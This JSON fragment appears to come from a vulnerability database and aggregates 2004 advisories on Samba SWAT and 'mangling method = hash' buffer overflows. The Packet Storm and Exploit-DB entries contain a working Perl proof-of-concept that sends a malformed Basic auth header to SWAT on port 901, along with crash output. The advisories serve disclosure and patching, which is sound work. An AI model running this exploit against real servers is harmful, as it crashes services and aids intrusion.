including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0.2\r\n\r\niQA/AwUBQQZAC+AfOvwtKn1ZEQLHWgCgnK6lo0FnLfC1FrfJqZ4fBsSL4N8An3fY\r\n9CxSYZ5TdGSIiXshpd6SQLPw\r\n=JjWX\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-07-28T00:00:00", "published": "2004-07-28T00:00:00", "id": "SECURITYVULNS:DOC:6545", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6545", "title": "[security bulletin] SSRT4782 rev. 0 HP-UX CIFS Server potential remote root access", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "### Background\n\nSamba is a package which allows *nix systems to act as file servers for Windows computers. It also allows *nix systems to mount shares exported by a Samba/CIFS/Windows server. The Samba Web Administration Tool (SWAT) is a web-based configuration tool part of the Samba package. \n\n### Description\n\nEvgeny Demidov found a buffer overflow in SWAT, located in the base64 data decoder used to handle HTTP basic authentication (CAN-2004-0600). The same flaw is present in the code used to handle the sambaMungedDial attribute value, when using the ldapsam passdb backend. Another buffer overflow was found in the code used to support the 'mangling method = hash' smb.conf option (CAN-2004-0686). Note that the default Samba value for this option is 'mangling method = hash2' which is not vulnerable. \n\n### Impact\n\nThe SWAT authentication overflow could be exploited to execute arbitrary code with the rights of the Samba daemon process. The overflow in the sambaMungedDial handling code is not thought to be exploitable. The buffer overflow in 'mangling method = hash' code could also be used to execute arbitrary code on vulnerable configurations. \n\n### Workaround\n\nUsers disabling SWAT, not using ldapsam passdb backends and not using the 'mangling method = hash' option are not vulnerable. \n\n### Resolution\n\nAll Samba users should upgrade to the latest version: \n \n \n # emerge sync\n \n # emerge -pv \">=net-fs/samba-3.0.5\"\n # emerge \">=net-fs/samba-3.0.5\"", "edition": 1, "modified": "2004-07-29T00:00:00", "published": "2004-07-29T00:00:00", "id": "GLSA-200407-21", "href": "https://security.gentoo.org/glsa/200407-21", "type": "gentoo", "title": "Samba: Multiple buffer overflows", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:13:32", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0398", "CVE-2004-0179", "CVE-2004-0600"], "description": "The Samba Web Administration Tool (SWAT) was found vulnerable to a buffer overflow in its base64 code. This buffer overflow can possibly be exploited remotely before any authentication took place to execute arbitrary code. The same piece of vulnerable code was also used in ldapsam passdb and in the ntlm_auth tool. This vulnerability only exists on Samba 3.0.2 to 3.0.4.", "edition": 1, "modified": "2004-07-23T11:20:42", "published": "2004-07-23T11:20:42", "id": "SUSE-SA:2004:022", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-07/msg00005.html", "title": "remote root compromise in samba", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "samba": [{"lastseen": "2019-05-29T17:19:12", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686"], "description": "A buffer overrun has been located in the code used to support the 'mangling method = hash' smb.conf option. Please be aware that the default setting for this parameter is 'mangling method = hash2' and therefore not vulnerable.\nAffected Samba 3 installations can avoid this possible security bug by using the default hash2 mangling method. Server installations requiring the hash mangling method are encouraged to upgrade to Samba 3.0.5.\n #### Protecting Unpatched Servers\nThe Samba Team always encourages users to run the latest stable release as a defense of against attacks. However, under certain circumstances it may not be possible to immediately upgrade important installations. In such cases, administrators should read the \"Server Security\" documentation found at http://www.samba.org/samba/docs/server_security.html.", "edition": 4, "modified": "2004-07-22T00:00:00", "published": "2004-07-22T00:00:00", "id": "SAMBA:CVE-2004-0686", "href": "https://www.samba.org/samba/security/CVE-2004-0686.html", "title": "Potential Buffer Overrun in smbd ", "type": "samba", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T17:19:12", "bulletinFamily": "software", "cvelist": ["CVE-2004-0600"], "description": "The internal routine used by the Samba Web Administration Tool (SWAT v3.0.2 and later) to decode the base64 data during HTTP basic authentication is subject to a buffer overrun caused by an invalid base64 character. It is recommended that all Samba v3.0.2 or later installations running SWAT either (a) upgrade to v3.0.5, or (b) disable the swat administration service as a temporary workaround.\nThis same code is used internally to decode the sambaMungedDial attribute value when using the ldapsam passdb backend. While we do not believe that the base64 decoding routines used by the ldapsam passdb backend can be exploited, sites using an LDAP directory service with Samba are strongly encouraged to verify that the DIT only allows write access to sambaSamAccount attributes by a sufficiently authorized user.", "edition": 4, "modified": "2004-07-22T00:00:00", "published": "2004-07-22T00:00:00", "id": "SAMBA:CVE-2004-0600", "href": "https://www.samba.org/samba/security/CVE-2004-0600.html", "title": "Potential Buffer Overrun in SWAT ", "type": "samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686"], "edition": 1, "description": "## Vulnerability Description\nSamba contains a flaw related to the \"mangling method = hash\" option that may allow an attacker to cause a buffer overflow. No further details have been provided.\n## Solution Description\nUpgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSamba contains a flaw related to the \"mangling method = hash\" option that may allow an attacker to cause a buffer overflow. No further details have been provided.\n## References:\nVendor URL: http://www.samba.org/\n[Vendor Specific Advisory URL](http://www.netwosix.org/adv15.html)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01062)\n[Vendor Specific Advisory URL](http://www.openpkg.org/security/OpenPKG-SA-2004.033-samba.txt)\n[Vendor Specific Advisory URL](http://www.tinysofa.org/support/errata/2004/014.html)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_22_samba.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000851)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-21.xml)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-57664-1&searchclause=)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000854)\n[Secunia Advisory ID:12130](https://secuniaresearch.flexerasoftware.com/advisories/12130/)\n[Secunia Advisory ID:12972](https://secuniaresearch.flexerasoftware.com/advisories/12972/)\n[Secunia Advisory ID:12168](https://secuniaresearch.flexerasoftware.com/advisories/12168/)\n[Related OSVDB ID: 8190](https://vulners.com/osvdb/OSVDB:8190)\nRedHat RHSA: RHSA-2004:259-23\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:071\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2004-404.html\nOther Advisory URL: http://www.samba.org/samba/whatsnew/samba-3.0.5.html\nOther Advisory URL: http://www.trustix.net/errata/2004/0039/\n[Nessus Plugin ID:13846](https://vulners.com/search?query=pluginID:13846)\n[Nessus Plugin ID:13657](https://vulners.com/search?query=pluginID:13657)\nISS X-Force ID: 16786\n[CVE-2004-0686](https://vulners.com/cve/CVE-2004-0686)\n", "modified": "2004-07-22T03:44:32", "published": "2004-07-22T03:44:32", "href": "https://vulners.com/osvdb/OSVDB:8191", "id": "OSVDB:8191", "type": "osvdb", "title": "Samba Mangling Method Hash Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0600"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Samba. The Samba Web Administration Tool (SWAT) fails to perform proper bounds checking when decoding base64 data during HTTP basic authentication resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Samba. The Samba Web Administration Tool (SWAT) fails to perform proper bounds checking when decoding base64 data during HTTP basic authentication resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.samba.org/\n[Vendor Specific Advisory URL](http://www.netwosix.org/adv15.html)\n[Vendor Specific Advisory URL](http://www.openpkg.org/security/OpenPKG-SA-2004.033-samba.txt)\n[Vendor Specific Advisory URL](http://www.tinysofa.org/support/errata/2004/014.html)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_22_samba.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000851)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-21.xml)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000854)\n[Secunia Advisory ID:12130](https://secuniaresearch.flexerasoftware.com/advisories/12130/)\n[Secunia Advisory ID:12087](https://secuniaresearch.flexerasoftware.com/advisories/12087/)\n[Secunia Advisory ID:12454](https://secuniaresearch.flexerasoftware.com/advisories/12454/)\n[Related OSVDB ID: 8191](https://vulners.com/osvdb/OSVDB:8191)\nRedHat RHSA: RHSA-2004:259-23\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:071\nOther Advisory URL: http://www.samba.org/samba/whatsnew/samba-3.0.5.html\nOther Advisory URL: http://www.trustix.net/errata/2004/0039/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0249.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0258.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0256.html\n[CVE-2004-0600](https://vulners.com/cve/CVE-2004-0600)\n", "modified": "2004-07-22T03:44:32", "published": "2004-07-22T03:44:32", "href": "https://vulners.com/osvdb/OSVDB:8190", "id": "OSVDB:8190", "type": "osvdb", "title": "Samba SWAT HTTP Basic Auth base64 Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:59", "description": "", "published": "2004-07-23T00:00:00", "type": "packetstorm", "title": "sambaPoC.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0600"], "modified": "2004-07-23T00:00:00", "id": "PACKETSTORM:33855", "href": "https://packetstormsecurity.com/files/33855/sambaPoC.txt.html", "sourceData": "`Hi, \n \nThe following is a brief proof of concept exploit code for the vulnerability \nmentioned in \"Evgeny Demidov\" <demidov@gleg.net>'s advisory: Samba 3.x swat \npreauthentication buffer overflow \n \nRunning the perl script against a vulnerable SWAT server will cause: \nProgram received signal SIGSEGV, Segmentation fault. \n[Switching to process 30853] \n0x410957af in memcpy () from /lib/tls/libc.so.6 \n(gdb) bt \n#0 0x410957af in memcpy () from /lib/tls/libc.so.6 \n#1 0xbffff340 in ?? () \n#2 0x00000001 in ?? () \n#3 0x080e34e7 in ?? () \n#4 0xbffff5e5 in ?? () \n#5 0x082919a0 in ?? () \n#6 0xffffffff in ?? () \n#7 0x080e08f0 in ?? () \n#8 0x082919a0 in ?? () \n#9 0xffffffff in ?? () \n#10 0x080e7090 in ?? () \n#11 0x0c0b8fae in ?? () \n#12 0xbffff5e5 in ?? () \n#13 0x00000000 in ?? () \n#14 0xbffff5a8 in ?? () \n#15 0x0806c97d in ?? () \n#16 0xbffff5e5 in ?? () \n#17 0x0815fd76 in ?? () \n#18 0x00000006 in ?? () \n#19 0x41150ebc in ?? () from /lib/tls/libc.so.6 \n#20 0x081c8480 in ?? () \n#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6 \n#22 0xbffff3b4 in ?? () \n#23 0x081c8480 in ?? () \n#24 0x081c887f in ?? () \n#25 0x00000000 in ?? () \n#26 0x00000000 in ?? () \n#27 0xbffff3b4 in ?? () \n#28 0xbffff4cc in ?? () \n#29 0x00000400 in ?? () \n#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6 \n#31 0xbffff3b4 in ?? () \n#32 0x08162fd9 in ?? () \n#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6 \n#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6 \n#35 0x00000000 in ?? () \n \n \nExploit: \n#!/usr/bin/perl \n# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow \n# Created by Noam Rathaus of Beyond Security Ltd. \n# \n \nuse IO::Socket; \nuse strict; \n \nmy $host = $ARGV[0]; \n \nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, \nPeerPort => \"901\" ); \n \nunless ($remote) { die \"cannot connect to http daemon on $host\" } \n \nprint \"connected\\n\"; \n \n$remote->autoflush(1); \n \nmy $http = \"GET / HTTP/1.1\\r \nHost: $host:901\\r \nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \nFirefox/0.9.1\\r \nAccept: text/xml\\r \nAccept-Language: en-us,en;q=0.5\\r \nAccept-Encoding: gzip,deflate\\r \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r \nKeep-Alive: 300\\r \nConnection: keep-alive\\r \nAuthorization: Basic =\\r \n\\r \n\"; \n \nprint \"HTTP: [$http]\\n\"; \nprint $remote $http; \nsleep(1); \nprint \"Sent\\n\"; \n \nwhile (<$remote>) \n{ \n&nbsp;print $_; \n} \nprint \"\\n\"; \n \nclose $remote; \n \n-- \nThanks \nNoam Rathaus \nCTO \nBeyond Security Ltd. \n \nJoin the SecuriTeam community on Orkut: \nhttp://www.orkut.com/Community.aspx?cmm=44441 \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/33855/sambaPoC.txt"}], "exploitdb": [{"lastseen": "2016-01-31T12:15:08", "description": "Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit. CVE-2004-0600. Remote exploit for linux platform", "published": "2004-07-22T00:00:00", "type": "exploitdb", "title": "Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0600"], "modified": "2004-07-22T00:00:00", "id": "EDB-ID:364", "href": "https://www.exploit-db.com/exploits/364/", "sourceData": "#!/usr/bin/perl\r\n# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow\r\n# Created by Noam Rathaus of Beyond Security Ltd.\r\n#\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\nmy $host = $ARGV[0];\r\n\r\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, \r\nPeerPort => \"901\" );\r\n\r\nunless ($remote) { die \"cannot connect to http daemon on $host\" }\r\n\r\nprint \"connected\\n\";\r\n\r\n$remote->autoflush(1);\r\n\r\nmy $http = \"GET / HTTP/1.1\\r\r\nHost: $host:901\\r\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \r\nFirefox/0.9.1\\r\r\nAccept: text/xml\\r\r\nAccept-Language: en-us,en;q=0.5\\r\r\nAccept-Encoding: gzip,deflate\\r\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\r\nKeep-Alive: 300\\r\r\nConnection: keep-alive\\r\r\nAuthorization: Basic =\\r\r\n\\r\r\n\";\r\n\r\nprint \"HTTP: [$http]\\n\";\r\nprint $remote $http;\r\nsleep(1);\r\nprint \"Sent\\n\";\r\n\r\nwhile (<$remote>)\r\n{\r\n\u00c2\u00a0print $_;\r\n}\r\nprint \"\\n\";\r\n\r\nclose $remote;\r\n\r\n# milw0rm.com [2004-07-22]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/364/"}]}